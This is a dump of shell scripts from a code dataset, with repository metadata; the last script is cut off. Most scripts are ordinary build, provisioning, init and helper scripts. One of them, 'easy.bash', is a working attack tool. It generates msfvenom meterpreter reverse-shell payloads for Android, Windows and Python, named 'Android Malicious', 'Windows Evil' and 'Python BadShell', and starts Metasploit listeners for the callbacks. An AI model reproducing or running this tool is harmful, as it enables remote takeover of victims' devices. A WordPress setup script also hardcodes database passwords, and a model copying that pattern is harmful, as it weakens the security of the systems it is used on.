blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
b4ac310e6baa6eaf4fbc986827b7c34de1505c0e
|
Shell
|
LiberatorUSA/GUCEF
|
/projects/k3s/github/create_github_runner_image.sh
|
UTF-8
| 568
| 2.828125
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
#
# Build the derived GitHub Actions runner image and import it into the
# local k3s container runtime.
#
# Fixed: abort on the first failed step — previously a failed `docker build`
# still saved and imported a stale image.
set -euo pipefail

IMAGE=vanvelzen/github-runner-base:latest
TARBALL=./vanvelzen-github-runner-base-latest.tar

#if [ $# -eq 0 ]
#  then
#    tag='latest'
#  else
#    tag=$1
#fi

# first get a listing of the current container for analysis
docker inspect summerwind/actions-runner:latest
# build the derived github runner build image
docker build -f github_runner_build_image.dockerfile . -t "$IMAGE"
# save the image as a local tar file
docker save --output "$TARBALL" "$IMAGE"
# Import the image into k3s
sudo k3s ctr images import "$TARBALL"
| true
|
505b616fde76421a8b79656758907f38b7104c8d
|
Shell
|
RestiSanchez/ASIR2-IAW-Practica08
|
/Fase_1/front.sh
|
UTF-8
| 3,009
| 3.21875
| 3
|
[] |
no_license
|
#!/bin/bash
#
# Provision the WordPress frontend tier: install Apache + PHP, deploy
# WordPress under /var/www/html, point wp-config.php at the remote MySQL
# backend and install fresh security keys fetched from the WordPress API.
# Intended to run as root on a fresh Ubuntu instance.
set -x
# Deployment variables.
# NOTE(review): DB credentials and IPs are hardcoded — parameterize/rotate
# before reuse.
DB_NAME=wordpress_db
DB_USER=wordpress_user
DB_PASSWORD=wordpress_password
IP_PRIVADA_FRONTEND=172.31.62.193
IP_PRIVADA_MYSQL_SERVER=172.31.53.230
IP_PUBLICA_FRONTEND=54.236.56.144
# Refresh the package index.
apt update
# Install Apache.
apt install apache2 -y
# Install the PHP modules Apache/WordPress need.
apt install php libapache2-mod-php php-mysql -y
# Copy the info.php probe page to the web root.
cp /home/ubuntu/info.php /var/www/html
# Restart Apache so it picks up PHP.
systemctl restart apache2
# Download WordPress into the web root.
cd /var/www/html
wget http://wordpress.org/latest.tar.gz
# Unpack the tarball...
tar -xzvf latest.tar.gz
# ...and remove it.
rm latest.tar.gz
# Configure WordPress: DB name, user, password and remote DB host.
cd /var/www/html/wordpress
mv wp-config-sample.php wp-config.php
sed -i "s/database_name_here/$DB_NAME/" wp-config.php
sed -i "s/username_here/$DB_USER/" wp-config.php
sed -i "s/password_here/$DB_PASSWORD/" wp-config.php
sed -i "s/localhost/$IP_PRIVADA_MYSQL_SERVER/" wp-config.php
# Define WP_SITEURL and WP_HOME (inserted after existing anchor lines).
sed -i "/DB_COLLATE/a define('WP_SITEURL', 'http://$IP_PUBLICA_FRONTEND/wordpress');" /var/www/html/wordpress/wp-config.php
sed -i "/WP_SITEURL/a define('WP_HOME', 'http://$IP_PUBLICA_FRONTEND');" /var/www/html/wordpress/wp-config.php
# Copy wordpress/index.php to the web root...
cp /var/www/html/wordpress/index.php /var/www/html
# ...and fix its include path to point into the wordpress/ subdirectory.
sed -i "s#wp-blog-header.php#wordpress/wp-blog-header.php#" /var/www/html/index.php
# Enable Apache's mod_rewrite (needed for WordPress permalinks).
a2enmod rewrite
cd /home/ubuntu
# Install the .htaccess shipped with this repository.
cp ASIR2-IAW-Practica08/Fase_1/htaccess /var/www/html/.htaccess
# Install the Apache vhost configuration.
cp ASIR2-IAW-Practica08/Fase_1/000-default.conf /etc/apache2/sites-available/000-default.conf
# Restart Apache to apply vhost + rewrite changes.
systemctl restart apache2
# Remove the placeholder AUTH/SALT definitions from wp-config.php so the
# freshly fetched keys appended below are the only ones present.
sed -i "/AUTH_KEY/d" /var/www/html/wordpress/wp-config.php
sed -i "/SECURE_AUTH_KEY/d" /var/www/html/wordpress/wp-config.php
sed -i "/LOGGED_IN_KEY/d" /var/www/html/wordpress/wp-config.php
sed -i "/NONCE_KEY/d" /var/www/html/wordpress/wp-config.php
sed -i "/AUTH_SALT/d" /var/www/html/wordpress/wp-config.php
sed -i "/SECURE_AUTH_SALT/d" /var/www/html/wordpress/wp-config.php
sed -i "/LOGGED_IN_SALT/d" /var/www/html/wordpress/wp-config.php
sed -i "/NONCE_SALT/d" /var/www/html/wordpress/wp-config.php
# Fetch fresh security keys from the WordPress API.
SECURITY_KEYS=$(curl https://api.wordpress.org/secret-key/1.1/salt/)
# Replace '/' with '_' so the keys can be injected safely through sed.
SECURITY_KEYS=$(echo $SECURITY_KEYS | tr / _)
# Append the keys after the "@-" marker line left in wp-config.php.
sed -i "/@-/a $SECURITY_KEYS" /var/www/html/wordpress/wp-config.php
# Remove Apache's default index.html from the web root.
rm -f /var/www/html/index.html
# Hand ownership of the web root to the Apache user.
chown www-data:www-data /var/www/html/ -R
| true
|
ad4f687870a44ea332329fc85dcbdaaee0bca331
|
Shell
|
dyylam/easymsf
|
/easy.bash
|
UTF-8
| 1,412
| 3.109375
| 3
|
[] |
no_license
|
#!/bin/bash
i="0"
resize -s 27 80
clear
while [ $i -lt 1 ]
do
clear
ip=$(ip addr show wlan0 | awk '/inet / {print $2}' | cut -d/ -f 1 )
echo -e '\e[1:33m
\e[1;32m
IP = $ip
(1) Android Malicious
(2) Windows Evil
(3) Python BadShell
'
service postgresql start
apk='1'
exe='2'
py='3'
read x
if [ "$x" == "$apk" ]; then
msfvenom -p android/meterpreter/reverse_tcp lhost=$ip lport=4444 -f apk > /sdcard/app.apk
echo -e '
!!!!!!!!!!!!!!!!!
!!Payload listo!!
!!!!!!!!!!!!!!!!!
'
msfconsole -q " use exploit/multi/handler; set payload android/meterpreter/reverse_tcp ; set lhost=$ip ; set lport=4444 ; exploit ;"
elif [ "$x" == "$exe" ]; then #EXE
msfvenom -p windows/meterpreter/reverse_tcp lhost=$ip lport=4444 -f exe > /sdcard/evil.exe
echo -e '
!!!!!!!!!!!!!!!!!
!!Payload listo!!
!!!!!!!!!!!!!!!!!
'
msfconsole -q -x " use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost $ip ; set lport 4444 ; exploit ;"
elif [ "$x" == "$py" ]; then #PYTHON
msfvenom -p python/meterpreter/reverse_tcp lhost=$ip lport=4444 > /sdcard/ducky.py
echo -e '
!!!!!!!!!!!!!!!!!
!!Payload listo!!
!!!!!!!!!!!!!!!!!
'
msfconsole -q -x " use exploit/multi/handler; set payload python/meterpreter/reverse_tcp; set lhost $ip ; set lport 4444 ; exploit ;"
read
else
n
fi
done
| true
|
2692366d3a9ad19b4760c5df02dfd11e5d9c1372
|
Shell
|
eduardoefb/rainv
|
/files/scripts/update_v2.sh
|
UTF-8
| 6,426
| 3.78125
| 4
|
[] |
no_license
|
#!/bin/bash
#
# Batch pipeline: ingest uploaded customer log archives, parse log/XML/CSV
# data, regenerate per-customer Excel reports and publish them through a
# Dropbox shared folder. Marker files ($SCRIPT_DIR/cust_run, log_run,
# xml_run) flag an in-flight background stage; progress text is mirrored
# into $SCRIPT_EXEC_STATUS_FILE. All path/command variables come from
# /opt/nokia/nedata/scripts/var.conf.
#functions:
# Resolve the customer for uploaded archive $f (global) in the background;
# the cust_run marker file exists while the lookup is running.
function f_customer(){
rm $SCRIPT_DIR/cust_run 2>/dev/null
echo 1 > $SCRIPT_DIR/cust_run
$SCRIPT_DIR/find_customer.sh $f >> $SCRIPT_DIR/update.log
rm $SCRIPT_DIR/cust_run 2>/dev/null
}
# Run the log parser; the log_run marker file exists while it is running.
function update_log(){
rm $SCRIPT_DIR/log_run 2>/dev/null
echo 1 > $SCRIPT_DIR/log_run
$PARSE_LOG_CMD >> $SCRIPT_DIR/update.log
rm $SCRIPT_DIR/log_run 2>/dev/null
}
# Run the XML/DAT/CSV parser for every customer directory (identified by a
# hidden .id file holding the customer id); xml_run marker while running.
function update_xml(){
rm $SCRIPT_DIR/xml_run 2>/dev/null
echo 1 > $SCRIPT_DIR/xml_run
for f in `find $NE_LOG_DIR"/" -name .id`; do
id=`cat $f`
path=`echo $f | sed 's/\.id//g'`
echo "Finding XML, DAT, CSV for parsing on $path" >> $SCRIPT_DIR/update.log
$PARSE_XML_CMD -i $path*{.xml,.dat,.csv} -c $id >> $SCRIPT_DIR/update.log
done
rm $SCRIPT_DIR/xml_run 2>/dev/null
}
# Stop the Dropbox client as $DROPBOX_USER.
function dropbox_stop(){
su - $DROPBOX_USER << EOF
dropbox stop 2>/dev/null
EOF
}
# Start the Dropbox client as $DROPBOX_USER.
function dropbox_start(){
su - $DROPBOX_USER << EOF
dropbox start 2>/dev/null
EOF
}
# Restart Dropbox and capture the share link for the RA_Data folder.
function get_dropbox_link(){
dropbox_stop
sleep 30
dropbox_start
sleep 10
su - $DROPBOX_USER > $WORK_DIR/scripts/dropbox_link << EOF
dropbox sharelink ~/Dropbox/Public/RA_Data
EOF
}
#Constants:
source /opt/nokia/nedata/scripts/var.conf
export SCRIPT_RUNNING_FILE_INDICATION=$TMP_LOG_UPLOAD_DIR"/run"
#Variables:
unset customer
unset cust_changed
#Check if the file $SCRIPT_RUNNING_FILE_INDICATION exists, if yes, start script. If no: stop
if [ ! -f $SCRIPT_RUNNING_FILE_INDICATION ]; then
exit
fi
#Remove the current_database directories:
# NOTE(review): the unquoted pattern *-current_database can be glob-expanded
# by the shell in $PWD before find ever sees it; safer quoted.
for dire in $(find $WORK_DIR/logs -name *-current_database); do
rm -rfv $dire
done
rm $SCRIPT_RUNNING_FILE_INDICATION
#Copy the files, if exists
for f in `ls $TMP_LOG_UPLOAD_DIR/*.zip 2>/dev/null`; do
f_customer $f &
sleep 10
# Poll until the background customer lookup clears its marker, mirroring
# a "Processing: <archive>" line into the status file.
while [ -f $SCRIPT_DIR/cust_run ]; do
lin=`tail -1 $SCRIPT_DIR/update.log` # > /tmp/status
lin1=`echo Processing: $f`
rm /tmp/status 2>/dev/null
echo $lin1 > /tmp/status
mv /tmp/status $SCRIPT_EXEC_STATUS_FILE
sleep 5
done
rm $f 2>/dev/null
done
#Find the directories where customer logs are located:
changes=0
for fle in `find $NE_LOG_DIR"/" -name .id`; do
cid=`cat $fle`
cid=$(($cid-1))
# Customer name is taken as the 6th path component of the .id file's path.
cname=`echo $fle | awk -F '/' '{print $6}'`
customer[cid]=$cname
cust_changed[cid]=0
# Count new entries (anything not *.old / *-current) for this customer.
cust_changed[cid]=`ls -l $NE_LOG_DIR"/"$cname"/" | grep -v "\.old" | grep -v "\-current" | grep -v total | wc -l`
changes=$(($changes+${cust_changed[cid]}))
done
#If there is no changes, abort script:
if [ $changes -eq 0 ]; then
exit
fi
#If there are changes, continue the script:
#Update dropbox shared link:
get_dropbox_link
#Stop dropbox:
dropbox_stop
#Start script, if $SCRIPT_RUNNING_FILE doesn't exist
if [ ! -f $SCRIPT_RUNNING_FILE ]; then
echo "1" > $SCRIPT_RUNNING_FILE
#Remove tmp files:
rm $SCRIPT_DIR/update.log 2>/dev/null
cat /dev/null >> $SCRIPT_DIR/update.log
#remove #current_database files:
#find /opt/nokia/nedata/logs/ -name *-current_database -exec rm -rf {}; 2>/dev/null
echo "Updating state information files..." > $SCRIPT_EXEC_STATUS_FILE
$SCRIPT_DIR/chk_state.sh > $SCRIPT_DIR/update.log
#Remove old files:
for fle in `find $NE_LOG_DIR"/" -name .id`; do
cid=`cat $fle`
cid=$(($cid-1))
# NOTE(review): here the customer name is field 7 of the path, while the
# earlier loop used field 6 — one of the two is likely wrong; confirm the
# expected directory depth.
cname=`echo $fle | awk -F '/' '{print $7}'`
# NOTE(review): the quoted "/*-old" suffix is NOT glob-expanded, so this rm
# only matches a literal file named '*-old', not old directories.
rm -rfv $NE_LOG_DIR"/"$cname"/*-old" >> $SCRIPT_DIR/update.log
done
#This php script will get the data from log files:
update_log&
sleep 10
while [ -f $SCRIPT_DIR/log_run ]; do
lin=`tail -1 $SCRIPT_DIR/update.log` # > /tmp/status
if [ `echo $lin | grep -i "(" | wc -l` -gt 0 ]; then
lin1=`echo Updating: $lin`
rm /tmp/status 2>/dev/null
echo $lin1 > /tmp/status
mv /tmp/status $SCRIPT_EXEC_STATUS_FILE
fi
sleep 5
done
#This function will call the java xml parser to get the data from xml files:
update_xml&
sleep 10
while [ -f $SCRIPT_DIR/xml_run ]; do
lin=`tail -1 $SCRIPT_DIR/update.log` # > /tmp/status
if [ `echo $lin | grep -i $NE_LOG_DIR"/" | wc -l` -gt 0 ]; then
# NOTE(review): $NE_LOG_DIR inside single quotes is never expanded — this
# sed deletes the literal text '$NE_LOG_DIR', not the actual path.
lin1=`echo Updating: $lin | sed 's/$NE_LOG_DIR//g'`
rm /tmp/status 2>/dev/null
echo $lin1 > /tmp/status
mv /tmp/status $SCRIPT_EXEC_STATUS_FILE
fi
sleep 5
done
if [ `cat $SCRIPT_DIR/update.log | wc -l` -eq 0 ]; then
for file_ext in csv dat xml; do
if [ `find $NE_LOG_DIR"/" -name *.$file_ext | wc -l` -gt 0 ]; then
echo "Found $file_ext files to parse" >> $SCRIPT_DIR/update.log
fi
done
fi
# If anything was parsed, rebuild the per-customer Excel reports and publish
# them (history dir, Dropbox shared dir, and a zip in $XLS_DL_DIR).
if [ `cat $SCRIPT_DIR/update.log | wc -l` -gt 0 ]; then
rm -rf $SCRIPT_DIR/xlsfiles 2>/dev/null
mkdir -p $SCRIPT_DIR/xlsfiles
cid=0
rm -rf $SCRIPT_DIR/xlsfiles/ 2>/dev/null
$SCRIPT_DIR/creategraph.sh 2>/dev/null
for c in ${customer[*]}; do
if [ ${cust_changed[cid]} -gt 0 ]; then
rm /tmp/status 2>/dev/null
echo "Creating excel files for $c..." > /tmp/status
mv /tmp/status $SCRIPT_EXEC_STATUS_FILE
mkdir -p $SCRIPT_DIR/xlsfiles/$c
# NOTE(review): '2 >> file' passes a literal argument "2" and appends only
# stdout — to append stderr this should read '2>> file' (no space).
$GENERATE_DATA_CMD -c $(($cid+1)) -d $SCRIPT_DIR/xlsfiles/$c/ >> $SCRIPT_DIR/update.log 2 >> $SCRIPT_DIR/update.log
#Copy files to history directory:
mkdir -p $SCRIPT_DIR/xls_history/$c/
cp -r $SCRIPT_DIR/xlsfiles/$c/* $SCRIPT_DIR/xls_history/$c/
#Copy files to dropbox shared directory:
cp -r $SCRIPT_DIR/xlsfiles/$c/ /home/$DROPBOX_USER/Dropbox/Public/RA_Data/
#Copy files to the XLS_DL_DIR/
mkdir -p $XLS_DL_DIR 2>/dev/null
rm -rf $XLS_DL_DIR/$c.zip 2>/dev/null
pushd $SCRIPT_DIR/xlsfiles/
zip -r $XLS_DL_DIR/$c.zip $c/*
popd
chown -R apache.apache $XLS_DL_DIR"/" 2>/dev/null
sleep 5
fi
cid=$(($cid+1))
done
fi
sleep 10
rm $SCRIPT_RUNNING_FILE
echo "Updated" > $SCRIPT_EXEC_STATUS_FILE
#Copy files from XLS_DL_DIR
#Start Dropbox:
dropbox_start
fi
| true
|
d86c6e40de1ba8414e732b6825adcdf8d0c0ec91
|
Shell
|
gpincheiraa/bln-frontend-project1
|
/ci/deploy
|
UTF-8
| 1,183
| 2.6875
| 3
|
[] |
no_license
|
#!/bin/bash
# CI deploy: write the bitcoin wallet config, build the frontend bundle and
# assemble the backend layout (public/ + server.js).
# Requires $BITCOIN_ADDRESS in the environment.
# Fixed: abort on the first failed step; previously a failed `npm run build`
# still "deployed".
set -euo pipefail
echo "============================================================="
echo "============================================================="
echo "          CONFIGURANDO DATOS BILLETERA BITCOIN          "
echo "============================================================="
# Emit the wallet address as JSON for the app to read at runtime.
echo '{ "address": "'"$BITCOIN_ADDRESS"'" }' > btc-config.json
# Fixed: the original ran `echo ls -lha | grep ...`, printing the literal
# text "ls -lha" instead of listing the generated file.
ls -lha | grep btc-config.json
echo "============================================================="
echo "          CONSTRUYENDO APLICACIÓN          "
echo "============================================================="
npm run build
echo "============================================================="
echo "          ESTRUCTURA APLICACIÓN FRONTEND          "
echo "============================================================="
ls -lha dist
echo "============================================================="
echo "          GENERAR ESTRUCTURA APLICACIÓN BACKEND          "
echo "============================================================="
mkdir -p public && cp -R dist/. ./public/
cp server/server.js .
ls -lha
echo "============================================================="
| true
|
a8286f1d7507c462bd4e6c571f31511bc0d74484
|
Shell
|
christian-posta/istio-demos
|
/cert-rotation/verify-certs.sh
|
UTF-8
| 774
| 2.640625
| 3
|
[] |
no_license
|
# Sanity-check the generated CA hierarchy: for each intermediate CA
# directory, confirm its root-cert.pem matches the issuing root CA's
# certificate (diff) and that its ca-cert chains to that root (step).
BASE="./certs"
ROOTA_DIR="$BASE/ROOTA"
ROOTB_DIR="$BASE/ROOTB"
INTERMEDIATE_A="$BASE/intermediate-rootA"
INTERMEDIATE_A2="$BASE/intermediate-rootA2"
INTERMEDIATE_B="$BASE/intermediate-rootB"

# check_intermediate <label> <root-ca-cert> <intermediate-dir>
check_intermediate() {
  echo "verifying root certs for $1"
  diff "$2" "$3/root-cert.pem"
  step certificate verify "$3/ca-cert.pem" --roots "$3/root-cert.pem"
}

check_intermediate "CA-A" "$ROOTA_DIR/certs/root_ca.crt" "$INTERMEDIATE_A"
check_intermediate "CA-A2" "$ROOTA_DIR/certs/root_ca.crt" "$INTERMEDIATE_A2"
check_intermediate "CA-B" "$ROOTB_DIR/certs/root_ca.crt" "$INTERMEDIATE_B"
| true
|
aa560b22cf93dc97207ba467e202434482c7d85d
|
Shell
|
bresilla/dotfiles
|
/.func/wm/sshoot
|
UTF-8
| 969
| 3.125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
#
# Screenshot helper: region-select via maim, copy the PNG to the clipboard,
# and optionally view it (--show) or OCR it to the clipboard (--ocr).
# The shot path is recorded in /tmp/screenshot_file and the image is pushed
# to an attached Android device at the end.
screenshot_file=/tmp/$(date +%s).png;
# Record the current shot's path so other tools can pick it up.
echo $screenshot_file > /tmp/screenshot_file;
# NOTE(review): 'accent' (second pywal color) is assigned but never used
# below — confirm whether it can be removed.
accent=$(cat /home/bresilla/.cache/wal/colors | head -2 | tail -1)
if [[ $1 == "--show" ]]; then
# Region screenshot -> file + clipboard, then open it in sxiv.
maim -u -s | tee $screenshot_file | xclip -sel clip -t image/png -i
sxiv $screenshot_file
elif [[ $1 == "--maim" ]]; then
# Region screenshot -> file + clipboard only.
maim -u -s | tee $screenshot_file | xclip -sel clip -t image/png -i
elif [[ $1 == "--ocr" ]]; then
TEXT_FILE="/tmp/ocr.txt"
IMAGE_FILE="/tmp/ocr.png"
maim -u -s | tee $IMAGE_FILE | xclip -sel clip -t image/png -i
# tesseract appends .txt itself, so pass the base name without extension.
tesseract "$IMAGE_FILE" "${TEXT_FILE//\.txt/}" 2> /dev/null
# Strip the form-feed character tesseract emits at page end.
sed -i 's/\x0c//' "$TEXT_FILE"
NUM_LINES=$(wc -l < $TEXT_FILE)
if [ "$NUM_LINES" -eq 0 ]; then
notify-send "ocr" "no text was detected"
exit 1
fi
# Put the recognized text on the clipboard and clean up.
xclip -selection clip < "$TEXT_FILE"
rm "$TEXT_FILE"
rm "$IMAGE_FILE"
fi
# Push the screenshot to the phone (requires adb connectivity).
adb push $screenshot_file /sdcard/From_Skynet
# sxiv $screenshot_file &
| true
|
22bda95b91822ae52ef7d4782eeccbce35e198c1
|
Shell
|
jumerkel/opsi-server
|
/scripts/opsiconfd
|
UTF-8
| 4,877
| 3.5625
| 4
|
[] |
no_license
|
#!/bin/sh
#
# SysV init script for the opsi configuration service (opsiconfd):
# start/stop/status/reload/restart. Prepares runtime directories, refreshes
# the TLS cert and LDAP machine password on UCS hosts, and polls the PID
# file to confirm successful start/stop.
#
### BEGIN INIT INFO
# Provides: opsiconfd
# Required-Start: $network $local_fs $remote_fs mysql
# Required-Stop: $network $local_fs $remote_fs mysql
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: opsi config service
# Description: Opsi Configuration Service
### END INIT INFO
# chkconfig: 2345 80 20
DAEMON=/usr/bin/opsiconfd
# This user must have read access to /etc/shadow
USER=opsiconfd
LOGDIR=/var/log/opsi/opsiconfd
PIDDIR=/var/run/opsiconfd
LIBDIR=/var/lib/opsiconfd
MBUSDIR=/var/run/opsi-message-bus
RRDDIR=$LIBDIR/rrd
PIDFILE=$PIDDIR/opsiconfd.pid
# Set to 1 to launch the opsiconfd-guard watchdog alongside the daemon.
START_GUARD=0
GUARD_BIN=/usr/bin/opsiconfd-guard
FQDN=$(hostname -f)
GLOBAL_CONF=/etc/opsi/global.conf
# See if the binary is there
if [ ! -x $DAEMON ]; then
echo "$DAEMON not installed"
[ "$1" = "stop" ] && exit 0
exit 5
fi
# Source key=value pairs from the global config (comments skipped).
# NOTE(review): eval of unvalidated config lines — values are trusted here.
if [ -e $GLOBAL_CONF ]; then
for kv in $(cat $GLOBAL_CONF | grep -v '^[#;]' | grep '=');
do eval $kv
done
#if [ ${opsi_message_bus_socket:0:5} = "/var/" ]; then
# MBUSDIR=$(dirname $opsi_message_bus_socket)
#fi
fi
# Start the daemon: prepare directories, refresh UCS credentials, launch,
# then poll the PID file (up to ~10s) to decide success or failure.
start() {
echo -n "Starting opsi config service.."
# Kill opsiconfd-guard
killall $(basename $GUARD_BIN) 1>/dev/null 2>/dev/null
# Make sure files are writable
test -e $LOGDIR || mkdir -p $LOGDIR
chown -R $USER $LOGDIR
test -e $LIBDIR || mkdir -p $LIBDIR
chown -R $USER $LIBDIR
test -e $RRDDIR || mkdir -p $RRDDIR
chown -R $USER $RRDDIR
test -e $PIDDIR || mkdir -p $PIDDIR
chown -R $USER $PIDDIR
test -e $MBUSDIR || mkdir -p $MBUSDIR
chown -R $USER $MBUSDIR
if [ -f $PIDFILE ] && ps h $(cat $PIDFILE) >/dev/null 2>/dev/null; then
echo ". (already running)."
[ "$START_GUARD" = "1" ] && $GUARD_BIN &
exit 0
else
[ -f $PIDFILE ] && rm $PIDFILE
# Copy server cert / key if running on ucs
if [ -e "/etc/univention/ssl/$FQDN/cert.pem" -a -e "/etc/univention/ssl/$FQDN/private.key" ]; then
cat /etc/univention/ssl/$FQDN/private.key > /etc/opsi/opsiconfd.pem
grep -A 50 "BEGIN CERTIFICATE" /etc/univention/ssl/$FQDN/cert.pem >> /etc/opsi/opsiconfd.pem
chmod 600 /etc/opsi/opsiconfd.pem
chown $USER:opsiadmin /etc/opsi/opsiconfd.pem || true
fi
# On UCS, sync the LDAP machine password into the backend config.
if [ -e /etc/opsi/backends/univention.conf -a -e /etc/machine.secret ]; then
LDAP_SECRET=$(cat /etc/machine.secret)
sed -i "s/^password\s*=.*/password = \"${LDAP_SECRET}\"/" /etc/opsi/backends/univention.conf
fi
su - $USER -c "$DAEMON -D"
# Poll: require the PID file + live process to be seen 3 times in a row;
# a disappearance after being seen means the daemon died during startup.
pidfileseen=0
running=false
i=1
while [ $i -le 10 ]; do
echo -n "."
if ([ -f $PIDFILE ] && ps h $(cat $PIDFILE) >/dev/null 2>/dev/null); then
pidfileseen=$(($pidfileseen+1))
if [ $pidfileseen -ge 3 ]; then
running=true
break
fi
else
if [ $pidfileseen -ge 1 ]; then
running=false
break
fi
fi
sleep 1
i=$(($i+1))
done
if [ "$running" = "true" ]; then
[ "$START_GUARD" = "1" ] && $GUARD_BIN &
echo " (done)."
else
echo " (failed)."
exit 1
fi
fi
# Warn (non-fatal) if PAM authentication cannot work for this user.
if ! su $USER -c "test -r /etc/shadow"; then
echo ""
echo " WARNING: User $USER lacks read permission for /etc/shadow."
echo " PAM authentication will fail."
echo ""
fi
}
# Stop the daemon: TERM via PID file with a ~10s grace period, then KILL;
# as a fallback, KILL any stray opsiconfd processes found via ps.
stop() {
echo -n "Stopping opsi config service.."
# Kill opsiconfd-guard
killall $(basename $GUARD_BIN) >/dev/null 2>/dev/null || true
if [ -f $PIDFILE ] && ps h $(cat $PIDFILE 2>/dev/null) >/dev/null 2>/dev/null; then
kill $(cat $PIDFILE 2>/dev/null) >/dev/null 2>/dev/null || true
running=true
i=1
while [ "$running" = "true" -a $i -le 10 ]; do
echo -n "."
if ([ -f $PIDFILE ] && ps h $(cat $PIDFILE 2>/dev/null) >/dev/null 2>/dev/null); then
sleep 1
i=$(($i+1))
else
running=false
fi
done
[ -f $PIDFILE ] && kill -9 $(cat $PIDFILE 2>/dev/null) >/dev/null 2>/dev/null || true
echo " (done)."
else
# No usable PID file: hunt for leftover opsiconfd processes (excluding
# this script's own PID) and force-kill them.
opsiconfd_pids=""
for pid in $(ps -A | grep opsiconfd | sed s'/^\s*//' | cut -d' ' -f1); do
[ -d "/proc/$pid" -a "$pid" != "$$" ] && opsiconfd_pids="$opsiconfd_pids $pid"
done
if [ "$opsiconfd_pids" = "" ]; then
echo ". (not running)."
else
kill -9 $opsiconfd_pids >/dev/null 2>/dev/null || true
echo " (done)."
fi
fi
[ -f $PIDFILE ] && rm $PIDFILE >/dev/null 2>/dev/null || true
}
case "$1" in
start)
start
;;
stop)
stop
;;
reload)
# SIGHUP asks the daemon to reload its configuration.
echo -n "Reloading opsi config service... "
if [ -f $PIDFILE ] && ps h $(cat $PIDFILE) > /dev/null; then
kill -1 $(cat $PIDFILE) >/dev/null 2>/dev/null
echo "(done)."
else
echo "(not running)."
fi
;;
restart|force-reload)
stop
sleep 1
start
;;
status)
# Exit 0 when running, 1 otherwise (LSB status convention subset).
echo -n "Checking opsi config service... "
if [ -f $PIDFILE ] && ps h $(cat $PIDFILE) > /dev/null; then
echo "(running)."
exit 0
fi
echo "(not running)."
exit 1
;;
*)
echo "Usage: /etc/init.d/opsiconfd {start|stop|status|reload|restart|force-reload}"
exit 1
;;
esac
exit 0
| true
|
428078d3c1cf99a7e722662100ada03f9f3a5f55
|
Shell
|
bitcoin-cash-node/bitcoin-cash-node
|
/cmake/utils/gen-doc-md.sh.in
|
UTF-8
| 6,127
| 3.46875
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Copyright (c) 2020-2021 The Bitcoin developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# CMake template (.sh.in): every @TOKEN@ below is substituted by
# configure_file() at build time. Builds the Markdown documentation tree
# (md/) and mkdocs.yml, including CLI help pages and JSON-RPC reference
# pages generated from a throwaway regtest node.
export LC_ALL=C
set -e
cd "@CMAKE_CURRENT_BINARY_DIR@"
rm -f mkdocs.yml
rm -rf md
mkdir md
cd "@CMAKE_SOURCE_DIR@"
# Stage all documentation sources and assets into md/, preserving relative
# paths via a tar pipe (NUL-delimited to survive odd filenames).
find . \( \
-name '*.md' \
-a -not -path './*/*.md' \
-o -path './contrib/*.md' \
-o -path './depends/*.md' \
-o -path './share/*.md' \
-o -path './share/examples/*' \
-o -path './src/*.md' \
-o -path './test/*.md' \
-o -path './doc/*.md' \
-o -path './doc/*.png' \
-o -path './doc/*.svg' \
-o -path './doc/*.css' \) \
-a -not -path './doc/html/*' \
-print0 \
| tar cf - --null -T - \
| tar xf - --directory "@CMAKE_CURRENT_BINARY_DIR@/md"
cd "@CMAKE_CURRENT_BINARY_DIR@"
# Create Markdown version of license.
# The first line becomes an H1 heading; the rest is indented as a code block.
first=1
while IFS= read -r line; do
if [ $first == 1 ]; then
echo "# $line" > md/COPYING.md
first=0
else
echo "    $line" >> md/COPYING.md
fi
done < "@CMAKE_SOURCE_DIR@/COPYING"
sed -i s/\]\(COPYING\)/\]\(COPYING.md\)/ md/README.md
# Generate command-line interface documentation.
mkdir -p md/doc/cli
"@CMAKE_SOURCE_DIR@/contrib/devtools/cli-help-to-markdown.py" "$(../src/bitcoind -??)" > md/doc/cli/bitcoind.md
if [ "@CMAKE_SYSTEM_NAME@" == "Darwin" ]; then
"@CMAKE_SOURCE_DIR@/contrib/devtools/cli-help-to-markdown.py" "$("../src/qt/@BITCOIN_QT_OSX_BUNDLE_NAME@.app/Contents/MacOS/@BITCOIN_QT_OSX_BUNDLE_NAME@" -??)" > md/doc/cli/bitcoin-qt.md
else
"@CMAKE_SOURCE_DIR@/contrib/devtools/cli-help-to-markdown.py" "$(../src/qt/bitcoin-qt -??)" > md/doc/cli/bitcoin-qt.md
fi
"@CMAKE_SOURCE_DIR@/contrib/devtools/cli-help-to-markdown.py" "$(../src/bitcoin-cli -?)" > md/doc/cli/bitcoin-cli.md
"@CMAKE_SOURCE_DIR@/contrib/devtools/cli-help-to-markdown.py" "$(../src/bitcoin-tx -?)" > md/doc/cli/bitcoin-tx.md
"@CMAKE_SOURCE_DIR@/contrib/devtools/cli-help-to-markdown.py" "$(../src/seeder/bitcoin-seeder -?)" > md/doc/cli/bitcoin-seeder.md
# Start a regtest node in a temporary data directory.
mkdir -p md/doc/json-rpc/tmp
../src/bitcoind -daemon -debuglogfile=0 -regtest -datadir="@CMAKE_CURRENT_BINARY_DIR@/md/doc/json-rpc/tmp" -rpcuser=gen-manpages -rpcpassword=gen-manpages
# Get daemon version which will be included in footer.
version="$(../src/bitcoind -version | head -n1)"
# Iterate over the existing mkdocs file and locate the entry for json-rpc/README.md.
while IFS= read -r line; do
# Copy existing mkdocs entries into the new mkdocs file.
# Remove draft release notes from menu for online publication.
if [ "@DOC_ONLINE@" == "OFF" ] || [ "${line: -21}" != " doc/release-notes.md" ]; then
echo "$line" >> mkdocs.yml
fi
# Find the json-rpc/README.md entry.
if [ "${line: -23}" == " doc/json-rpc/README.md" ]; then
indentation="${line%%-*}"
# The list of RPC commands will be inserted into the new mkdocs file below the readme entry.
# Get the list of RPC commands from the node and process it.
{
echo "Bitcoin Cash Node JSON-RPC commands"
echo "==================================="
